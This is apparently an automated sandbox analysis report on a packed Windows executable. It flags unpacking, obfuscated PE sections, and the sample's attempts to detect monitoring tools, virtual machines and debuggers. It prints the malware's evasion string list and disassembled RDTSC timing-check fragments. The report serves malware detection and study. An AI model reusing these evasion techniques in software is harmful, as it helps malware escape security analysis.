Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: kernel.appcore.dllJump to behavior
Source: qZA8AyGxiA.exeStatic file information: File size 4508672 > 1048576
Source: qZA8AyGxiA.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: qZA8AyGxiA.exeStatic PE information: Raw size of lyhwrnys is bigger than: 0x100000 < 0x1c0600

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeUnpacked PE file: 0.2.qZA8AyGxiA.exe.8a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lyhwrnys:EW;jcgkpoiz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lyhwrnys:EW;jcgkpoiz:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: qZA8AyGxiA.exeStatic PE information: real checksum: 0x45393c should be: 0x44ed84
Source: qZA8AyGxiA.exeStatic PE information: section name:
Source: qZA8AyGxiA.exeStatic PE information: section name: .idata
Source: qZA8AyGxiA.exeStatic PE information: section name:
Source: qZA8AyGxiA.exeStatic PE information: section name: lyhwrnys
Source: qZA8AyGxiA.exeStatic PE information: section name: jcgkpoiz
Source: qZA8AyGxiA.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A60B8C push edx; retn 0000h0_3_01A60B8D
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A60B8C push edx; retn 0000h0_3_01A60B8D
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A60B8C push edx; retn 0000h0_3_01A60B8D
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A60B8C push edx; retn 0000h0_3_01A60B8D
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A60B8C push edx; retn 0000h0_3_01A60B8D
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A60B8C push edx; retn 0000h0_3_01A60B8D
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A60B8C push edx; retn 0000h0_3_01A60B8D
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A60B8C push edx; retn 0000h0_3_01A60B8D
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A60B8C push edx; retn 0000h0_3_01A60B8D
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: qZA8AyGxiA.exeStatic PE information: section name: lyhwrnys entropy: 7.95526963720531

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: F82162 second address: F82166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: F82166 second address: F81A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 pushad 0x00000008 xor dword ptr [ebp+122D38C3h], eax 0x0000000e mov esi, dword ptr [ebp+122D2A3Fh] 0x00000014 popad 0x00000015 push dword ptr [ebp+122D1081h] 0x0000001b sub dword ptr [ebp+122D38C8h], edi 0x00000021 call dword ptr [ebp+122D2CA5h] 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a xor eax, eax 0x0000002c cmc 0x0000002d mov edx, dword ptr [esp+28h] 0x00000031 mov dword ptr [ebp+122D2FCCh], ebx 0x00000037 ja 00007FC728ECBE0Ch 0x0000003d or dword ptr [ebp+122D2FCCh], eax 0x00000043 mov dword ptr [ebp+122D2B4Bh], eax 0x00000049 stc 0x0000004a mov dword ptr [ebp+122D2E60h], esi 0x00000050 mov esi, 0000003Ch 0x00000055 sub dword ptr [ebp+122D2353h], eax 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f sub dword ptr [ebp+122D2FDFh], edx 0x00000065 lodsw 0x00000067 pushad 0x00000068 movsx ebx, cx 0x0000006b mov edx, dword ptr [ebp+122D29CBh] 0x00000071 popad 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 pushad 0x00000077 jmp 00007FC728ECBE0Eh 0x0000007c mov ax, AF71h 0x00000080 popad 0x00000081 jnp 00007FC728ECBE1Fh 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b jns 00007FC728ECBE0Ch 0x00000091 push eax 0x00000092 push eax 0x00000093 push edx 0x00000094 jmp 00007FC728ECBE0Ch 0x00000099 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11031A6 second address: 11031B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FC7292A9B06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10FA86F second address: 10FA8A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE10h 0x00000007 pushad 0x00000008 jmp 00007FC728ECBE0Ah 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007FC728ECBE06h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jbe 00007FC728ECBE45h 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 pop esi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10FA8A1 second address: 10FA8A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10FA8A5 second address: 10FA8B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC728ECBE06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10FA8B5 second address: 10FA8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7292A9B19h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10FA8D2 second address: 10FA8D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11023FB second address: 11023FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11023FF second address: 110240D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FC728ECBE0Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 110240D second address: 1102411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1105356 second address: 1105360 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC728ECBE0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1105360 second address: 110536F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 110536F second address: 1105373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1105373 second address: 110537D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 110537D second address: 1105381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1105381 second address: 11053D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+122D2B97h] 0x0000000e lea ebx, dword ptr [ebp+12457118h] 0x00000014 call 00007FC7292A9B10h 0x00000019 jg 00007FC7292A9B0Ch 0x0000001f pop esi 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 push ecx 0x00000023 jns 00007FC7292A9B06h 0x00000029 pop ecx 0x0000002a jmp 00007FC7292A9B11h 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 110549E second address: 11054EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007FC728ECBE11h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007FC728ECBE18h 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC728ECBE14h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11054EB second address: 1105554 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jp 00007FC7292A9B0Eh 0x00000012 push esi 0x00000013 jp 00007FC7292A9B06h 0x00000019 pop esi 0x0000001a pop eax 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007FC7292A9B08h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 add dword ptr [ebp+122D2F86h], edx 0x0000003b push 00000003h 0x0000003d add dl, 00000007h 0x00000040 push 00000000h 0x00000042 mov esi, dword ptr [ebp+122D2A5Fh] 0x00000048 push 00000003h 0x0000004a mov cx, 6120h 0x0000004e or dh, 00000057h 0x00000051 call 00007FC7292A9B09h 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 pushad 0x0000005a popad 0x0000005b pop eax 0x0000005c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1105554 second address: 11055A6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC728ECBE0Ch 0x00000008 ja 00007FC728ECBE06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jns 00007FC728ECBE12h 0x00000017 jbe 00007FC728ECBE0Ch 0x0000001d ja 00007FC728ECBE06h 0x00000023 mov eax, dword ptr [esp+04h] 0x00000027 push eax 0x00000028 jne 00007FC728ECBE08h 0x0000002e pop eax 0x0000002f mov eax, dword ptr [eax] 0x00000031 jmp 00007FC728ECBE16h 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11055A6 second address: 11055FB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC7292A9B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pop eax 0x0000000c mov edi, dword ptr [ebp+122D30C6h] 0x00000012 lea ebx, dword ptr [ebp+12457121h] 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FC7292A9B08h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FC7292A9B17h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11055FB second address: 1105605 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1105605 second address: 1105609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11056E7 second address: 11057A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dh, 92h 0x0000000e call 00007FC728ECBE0Bh 0x00000013 mov si, ax 0x00000016 pop ecx 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FC728ECBE08h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 push 90541885h 0x00000038 push esi 0x00000039 jmp 00007FC728ECBE16h 0x0000003e pop esi 0x0000003f add dword ptr [esp], 6FABE7FBh 0x00000046 mov dword ptr [ebp+122D1EC4h], edx 0x0000004c push 00000003h 0x0000004e mov dword ptr [ebp+122D2FD5h], ecx 0x00000054 push 00000000h 0x00000056 jmp 00007FC728ECBE0Dh 0x0000005b push 00000003h 0x0000005d jmp 00007FC728ECBE13h 0x00000062 mov cx, 0687h 0x00000066 call 00007FC728ECBE09h 0x0000006b pushad 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11057A1 second address: 11057C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC7292A9B16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11057C0 second address: 11057F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jg 00007FC728ECBE0Eh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007FC728ECBE12h 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11057F3 second address: 11057F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11057F8 second address: 1105815 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1105815 second address: 110581E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 110581E second address: 1105844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 pop eax 0x00000009 and edx, 696C8D87h 0x0000000f lea ebx, dword ptr [ebp+1245712Ch] 0x00000015 or dword ptr [ebp+122D38B0h], edi 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e je 00007FC728ECBE0Ch 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1105844 second address: 1105848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10EF088 second address: 10EF08C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10EF08C second address: 10EF092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1124B0B second address: 1124B1C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1124B1C second address: 1124B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1124C95 second address: 1124C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1124E1B second address: 1124E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11253F9 second address: 1125409 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC728ECBE12h 0x00000008 jp 00007FC728ECBE06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11256FA second address: 1125701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1125701 second address: 112570F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 112570F second address: 1125713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1125CD9 second address: 1125CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1125CDF second address: 1125CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10F259F second address: 10F25A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
